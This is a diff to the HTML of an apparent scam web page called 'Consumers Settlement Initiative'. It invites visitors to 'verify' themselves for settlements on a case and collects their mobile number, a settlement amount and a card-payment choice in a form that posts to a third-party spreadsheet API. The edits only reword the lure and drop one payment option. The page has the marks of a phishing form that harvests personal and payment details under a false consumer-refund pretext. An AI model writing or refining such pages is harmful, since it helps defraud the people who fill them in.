--- a/index.html
+++ b/index.html
@@ -131,13 +131,13 @@
 </style>
 
 <body>
-    <h2> Consumers Verification </h2>
+    <h2> Consumers Settlement Initiative</h2>
     <img src=" mobil.jpeg">
     <span onclick="document.getElementById('id01').style.display='none'" class="close"
         title="Close Modal">&times;</span>
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
         <div class="container">
-            <h1>Verify Your Self and get update Settlements on your legal case </h1>
+            <h1>Verify Your Self and get update Settlements on your case </h1>
             <p> Enter Your Correct details </p>
             <hr>
 
@@ -147,14 +147,14 @@
             <label for="number"><b>Mobile Number</b></label>
             <input type="text" placeholder="Enter Mobile Number" name="data[number]" required>
 
-            <label for="refund "><b>Enter your Refundable amount</b></label>
-            <input type="text" placeholder="Enter your Refundable amount" name="data[refund]" required>
+            <label for="refund "><b>Enter your Settlement amount</b></label>
+            <input type="text" placeholder="Enter your Settlement amount" name="data[refund]" required>
 
             <select name="mode" id="refund mode-select">
                 <option value="">--Please choose an option--</option>
                 <option value="Credit card">Credit card</option>
                 <option value="Debit card">Debit card</option>
-                <option value="UPI">UPI</option>
+
             </select>
 
             <button onclick="document.getElementById('id02').style.display='block'" style="width:auto;">Verify</button>
